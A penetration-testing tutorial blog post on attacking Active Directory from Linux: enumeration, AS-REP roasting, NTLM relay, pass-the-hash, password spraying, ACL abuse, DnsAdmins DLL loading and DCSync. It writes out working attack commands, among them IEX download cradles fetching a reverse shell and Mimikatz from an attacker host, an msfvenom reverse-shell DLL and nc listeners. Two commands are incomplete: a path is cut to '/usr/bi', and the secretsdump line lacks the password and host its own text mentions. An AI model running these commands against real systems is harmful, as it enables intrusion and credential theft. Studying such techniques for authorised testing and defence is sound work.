Attacking Active Directory with Linux
Hi, readers!
In this post we will look at enumerating and attacking Active Directory from a Linux host, including running PowerShell modules and scripts such as PowerView. Working from our own Linux box on the internal network is a real advantage: we do not have to evade AV/EDR signatures and behavioural detections on a domain-joined Windows machine, as long as we have network access to the segment where the domain lives.
Enumerate Active Directory
Install PowerShell on Linux
sudo apt update && sudo apt install -y curl gnupg apt-transport-https
curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -
sudo sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-bullseye-prod bullseye main" > /etc/apt/sources.list.d/microsoft.list'
sudo apt update && sudo apt install -y powershell
pwsh
The package is called powershell; pwsh is the binary it installs, so run it to get a PowerShell prompt from which PowerView (or any other .ps1 module) can be imported. apt-key is deprecated on current Debian releases, but still works for this repository.
Enumerate AD with Bloodhound-python
Example:
bloodhound-python -u kai.bel -p password1 -ns 192.168.200.129 -d cs.org -c All
Resources:
https://github.com/fox-it/BloodHound.py
https://github.com/BloodHoundAD/BloodHound
Pre-built queries worth running in the BloodHound GUI on the collected data:
Find Principals with DCSync Rights
Find AS-REP Roastable Users (DontReqPreAuth)
Find Computers with Unconstrained Delegation
Find Shortest Paths to Domain Admins
Identify live hosts with crackmapexec
Example:
crackmapexec smb 192.168.200.0/24 -d cs.org
The output gives, per host, the name, OS build and whether SMB signing is required (signing:True/False), which is exactly what we need later to pick relay targets.
Identify live hosts with nmap
Example:
nmap -sV -p445,139 192.168.200.0/24 -vvv
In this scenario we find three hosts: one DC and two workstations. Access to the shared folders is blocked, so the share-enumeration scripts below return little without credentials.
nmap --script smb-enum-shares -p 139,445 192.168.100.0/24
nmap --script=smb-enum* --script-args=unsafe=1 -T5 192.168.100.7
Identify live hosts with nbtscan
Example:
nbtscan -r 192.168.200.0/24
AS-REP Roasting
AS-REP Roasting targets accounts whose "Do not require Kerberos preauthentication" flag (DONT_REQ_PREAUTH in userAccountControl) is set. For such accounts the KDC answers an AS-REQ without the encrypted-timestamp preauthentication, and the AS-REP it returns contains a part encrypted with a key derived from the user's password, so it can be cracked offline.
Impacket GetNPUsers
Example:
/usr/bin/GetNPUsers.py cs.org/kai.bel:password1 -dc-ip 192.168.200.129 -request -format john -outputfile outputfile.txt
With valid credentials GetNPUsers.py queries LDAP for every account that has the flag and requests an AS-REP for each one (-request); without credentials it can still be run against a list of candidate user names with -usersfile and -no-pass. The hashes are written to outputfile.txt in john's $krb5asrep$ format.
Password cracking with john
Example:
john --format=krb5asrep outputfile.txt --wordlist=/usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt
Resources:
https://github.com/openwall/john
https://github.com/SecureAuthCorp/impacket/
SMB Signing Disabled / ntlmrelayx
This kind of attack is very dangerous: when servers do not require SMB signing, anybody with access to the network segment can provoke or capture an NTLM authentication (for example by poisoning LLMNR/NBT-NS name resolution with Responder), relay it to another server and obtain a session there as the victim user, without ever knowing the password.
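The check behind choosing relay targets, as an added Python example that is not code from the original post: a parser for the SecurityMode field of the SMB2 NEGOTIATE Response, which tells whether a server merely enables signing or requires it (only the former can be relayed to). The responses and host names are constructed inline; on a real network the bytes come off the socket after sending a NEGOTIATE request, or you read the signing column of the crackmapexec output.

```python
"""Pick NTLM-relay targets from SMB2 NEGOTIATE responses.

Added example, not code from the original post. Relaying to SMB only works
against servers that do not require signing, and the server states that in
the SecurityMode field of its SMB2 NEGOTIATE Response (MS-SMB2 2.2.4). The
responses here are constructed inline (build_negotiate_response).
"""
import struct

SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002
SMB2_HEADER_LEN = 64
SMB2_NEGOTIATE = 0x0000


def build_negotiate_response(security_mode: int, dialect: int = 0x0311) -> bytes:
    """Construct a minimal SMB2 NEGOTIATE Response (test data, not a real capture)."""
    header = struct.pack(
        "<4sHHIHHIIQIIQ16s",
        b"\xfeSMB", 64, 0, 0,       # ProtocolId, StructureSize, CreditCharge, Status
        SMB2_NEGOTIATE, 1,          # Command, CreditResponse
        0x00000001, 0,              # Flags (SMB2_FLAGS_SERVER_TO_REDIR), NextCommand
        0, 0, 0, 0,                 # MessageId, Reserved, TreeId, SessionId
        b"\x00" * 16,               # Signature
    )
    body = struct.pack(
        "<HHHH16sIIIIQQHHI",
        65, security_mode, dialect, 0,          # StructureSize, SecurityMode, Dialect, ContextCount
        b"\x00" * 16,                           # ServerGuid
        0, 0x800000, 0x800000, 0x800000,        # Capabilities, MaxTransact/Read/WriteSize
        0, 0,                                   # SystemTime, ServerStartTime
        0, 0, 0,                                # SecurityBufferOffset/Length, NegotiateContextOffset
    )
    return header + body + b"\x00"              # one-byte Buffer


def parse_security_mode(response: bytes) -> int:
    """Return SecurityMode from an SMB2 NEGOTIATE Response, validating the framing."""
    if len(response) < SMB2_HEADER_LEN + 6 or response[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 message")
    if struct.unpack_from("<H", response, 12)[0] != SMB2_NEGOTIATE:
        raise ValueError("not a NEGOTIATE response")
    struct_size, security_mode = struct.unpack_from("<HH", response, SMB2_HEADER_LEN)
    if struct_size != 65:
        raise ValueError("unexpected NEGOTIATE Response StructureSize")
    return security_mode


def signing_required(response: bytes) -> bool:
    """True when the server refuses unsigned sessions: not relayable."""
    return bool(parse_security_mode(response) & SMB2_NEGOTIATE_SIGNING_REQUIRED)


def relay_targets(responses: dict) -> list:
    """Hosts that do not require signing, i.e. candidates for ntlmrelayx -tf target.txt."""
    return sorted(host for host, resp in responses.items() if not signing_required(resp))


# Constructed responses and names: one server that requires signing (the
# domain-controller default) and two that only enable it (the Windows
# client default).
SAMPLE = {
    "dc01.cs.org": build_negotiate_response(
        SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED),
    "ws01.cs.org": build_negotiate_response(SMB2_NEGOTIATE_SIGNING_ENABLED),
    "ws02.cs.org": build_negotiate_response(SMB2_NEGOTIATE_SIGNING_ENABLED),
}

if __name__ == "__main__":
    for host in relay_targets(SAMPLE):
        print(host)            # one per line, ready for target.txt
```

Signing "enabled" without "required" is the default for Windows workstations and member servers, which is why the DC is rarely the relay target and the workstations are; requiring signing on all hosts (and disabling LLMNR/NBT-NS) is what closes this class of attack.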
Lateral Movement via SMB Relaying.
Responder and ntlmrelayx.py (relayed local admin: dumping the local SAM hashes)
Example:
sudo nano /usr/share/responder/Responder.conf (set SMB = Off and HTTP = Off, so Responder only poisons name resolution and leaves ports 445 and 80 free for ntlmrelayx)
sudo python3 /usr/share/responder/Responder.py -I eth0 -dw
sudo ln -s /usr/share/doc/python3-impacket/examples/* /usr/bi
sudo ntlmrelayx.py -tf target.txt -smb2support
target.txt lists the hosts to relay to; only servers that do not require SMB signing (signing:False in the crackmapexec output) are valid entries, because a signed session cannot be relayed.
Victim: a user manually enters a UNC share path whose name Responder poisons, so the client authenticates with NTLM to the attacker instead of the real share.
Attacker: ntlmrelayx relays that authentication to the hosts in target.txt and, where the relayed user is a local administrator there, dumps the local SAM hashes of 192.168.200.129 and 192.168.200.130.
Reverse shell via Responder and ntlmrelayx.py
sudo python3 /usr/share/responder/Responder.py -I eth0 -dw
python3 -m http.server 8080
ntlmrelayx.py -tf /home/hernan/target.txt -smb2support -c "powershell IEX(New-Object Net.WebClient).downloadString('http://192.168.1.6:8080/Invoke-PowerShellTcp.ps1')"
nc -lvp 443
Here ntlmrelayx runs the -c command on each relayed host instead of dumping the SAM. Invoke-PowerShellTcp.ps1 (nishang) only defines the function, so the served copy must end with the call itself (Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.6 -Port 443); otherwise IEX downloads it and nothing connects back to the nc listener.
mitm6 and ntlmrelayx.py
Example:
pip install mitm6
ntlmrelayx.py -6 -wh 192.168.1.6 -tf /home/hernan/target.txt -socks -debug -smb2support
mitm6 is started alongside ntlmrelayx with the target domain (its -d option): Windows prefers IPv6, so hosts accept the attacker as their DNS server and end up authenticating to it, in particular through WPAD, which -wh serves from the attacker's address; -6 makes ntlmrelayx listen on IPv6 as well. With -socks each relayed authentication is kept open as a SOCKS session that can be listed from the ntlmrelayx prompt:
ntlmrelayx> socks
The sessions are then used through proxychains with the usual tools (smbclient.py, secretsdump.py, and so on) without ever knowing the victim's password.
Pass The Hash
Pass the hash is a technique that lets an attacker authenticate to a remote server or service with the NTLM (or LM) hash of a user's password instead of the plaintext, which works because NTLM authentication only ever proves possession of the hash. The hash has to be obtained first (SAM or LSASS dump, a relay dump as above, DCSync), and the technique does not apply to services that only accept Kerberos.
crackmapexec
Example:
crackmapexec smb -u 'Administrador' -H '2b73e1a325df8ca7bd82063457391964' --exec-method smbexec -x whoami 192.168.200.0/24 -d cs.org
Evil-Winrm
Example:
evil-winrm -u Administrador -H '2b73e1a325df8ca7bd82063457391964' -i 192.168.200.129
Pth-Winexe
Example:
pth-winexe -U cs.org/Administrador%aad3b435b51404eeaad3b435b51404ee:2b73e1a325df8ca7bd82063457391964 //192.168.200.129 cmd.exe
Impacket
Example:
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:2b73e1a325df8ca7bd82063457391964 cs.org/Administrador@192.168.200.129
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2b73e1a325df8ca7bd82063457391964 cs.org/Administrador@192.168.200.129
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2b73e1a325df8ca7bd82063457391964 cs.org/Administrador@192.168.200.129
The target is the same DC as in the evil-winrm example. -hashes takes LMHASH:NTHASH; aad3b435b51404eeaad3b435b51404ee is the hash of an empty LM password, which is why the same value appears in every command.
Password Spraying
Password spraying is a technique for obtaining valid credentials that consists of trying the same password against many users, rather than many passwords against one user, so that no account reaches the lockout threshold. Check the domain lockout policy first (crackmapexec prints it with --pass-pol) and keep each user's attempts below the threshold within the observation window.
crackmapexec
Password spraying SMB
Example:
crackmapexec smb 192.168.200.128 -d cs.org -u users.txt -p 'Changeme123!'
By default crackmapexec stops at the first valid login; add --continue-on-success to keep testing the remaining users.
Connect remote SMB
Example:
/usr/bin/smbexec.py 'cs.org/administrador:cs2022!@192.168.200.128'
Example:
crackmapexec smb 192.168.200.128 -u 'administrador' -p 'cs2022!' -X 'ipconfig' -d cs.org
Password spraying winrm
Example:
crackmapexec winrm 192.168.200.129 -d cs.org -u /home/hernan/users.txt -p 'Changeme123!'
Connect remote winrm
Example:
evil-winrm -i 192.168.200.129 -u lancelot.carla -p Changeme123!
Resources:
https://github.com/Porchetta-Industries/CrackMapExec
https://github.com/SecureAuthCorp/impacket/
https://github.com/Hackplayers/evil-winrm
Abusing ACLs/ACEs
A misconfigured ACL on an Active Directory object can let a standard user (with low privileges) modify GPOs, add users to a given group, reset passwords, and so on.
In this scenario the members of the "Marketing" group have rights over the "Project Management" group and its users: they can add members to the group, reset passwords, etc.
Changing passwords (PowerView):
$Pass = ConvertTo-SecureString 'P@ssw0d!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('cs.org\merry.inger', $Pass)
$Cred is the compromised Marketing user and is passed with -Credential to the PowerView cmdlet that performs the change (Set-DomainUserPassword for a reset, Add-DomainGroupMember to add a member).
Granting a principal the right to add members (WriteMembers) to a group:
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Domain Admins" -PrincipalIdentity merry.inger -Rights WriteMembers
PS: this proof of concept can be done with PowerView (image omitted). Add-DomainObjectAcl needs -PrincipalIdentity, the principal that receives the right (here assumed to be merry.inger), and only succeeds when the credential already has WriteDacl on the target object; on "Domain Admins" that is normally only true for Domain Admins themselves.
DnsAdmin
For the attack to work you must have compromised an account that is a member of the DnsAdmins group or that otherwise has write access to the DNS server object.
The attack vector is to make the DNS service load an attacker-controlled DLL through the ServerLevelPluginDll setting. dns.exe runs as SYSTEM on the domain controller, so the DLL executes as SYSTEM the next time the service is restarted.
Example:
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.1.6 LPORT=80 -f dll > dns.dll
dnscmd.exe DC-01 /config /serverlevelplugindll C:\Users\kai.bel\Documents\dns.dll
sc.exe stop dns
sc.exe start dns
The DLL path is resolved by DC-01, so either place dns.dll at that location on the DC or give a UNC path to a share the DC's computer account can read. PS: restarting the service needs local administrator rights or service-control permissions on the DC; from another host, target it explicitly (sc.exe \\DC-01 stop dns). The DLL is loaded inside dns.exe, so a payload that crashes or never returns takes the DC's DNS service down with it, which is very visible; clear the setting afterwards by running the same dnscmd /config /serverlevelplugindll command with no value.
DCSync
DCSync abuses the directory replication protocol (MS-DRSR): an account holding the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights on the domain object (Domain Admins, Enterprise Admins and the domain controllers have them by default, and the ACL abuse above can grant them) can ask a DC to replicate any account, including its NTLM hash and Kerberos keys, without touching LSASS on the DC.
Mimikatz
Example:
IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.6/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command '"lsadump::dcsync /domain:cs.org /user:Administrador"'
Impacket
Example:
secretsdump.py cs.org/elle.maggee:
The password follows the colon and the DC follows an @ (impacket's domain/user:password@host syntax). Add -just-dc to limit the dump to the NTDS secrets, or -just-dc-user Administrador for a single account; the account used must hold the replication rights described above (elle.maggee is assumed to have them in this scenario).
And that is all! We hope you liked it and that it added to the knowledge you already had.
See you in the next posts!
Author
Omar Hernan Rodríguez Mendoza
Offensive Security - Entelgy Perú